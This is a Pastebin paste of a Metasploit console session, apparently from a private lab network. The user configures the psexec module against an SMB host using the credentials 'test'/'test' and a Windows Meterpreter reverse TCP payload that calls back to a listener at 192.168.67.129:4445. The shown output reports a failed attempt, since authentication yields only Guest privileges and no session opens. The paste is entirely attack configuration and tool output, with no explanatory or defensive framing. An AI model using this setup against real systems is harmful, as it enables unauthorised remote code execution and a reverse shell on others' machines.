Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(psexec) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST 192.168.1.101 yes The target address
- RPORT 445 yes Set the SMB service port
- SMBPass test no The password for the specified username
- SMBUser test yes The username to authenticate as
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process
- LHOST 192.168.67.129 yes The listen address
- LPORT 4445 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(psexec) > exploit
- [*] Started reverse handler on 192.168.67.129:4445
- [*] Connecting to the server...
- [*] Authenticating as user 'test'...
- [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
- [*] Exploit completed, but no session was created.
- msf exploit(psexec) >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement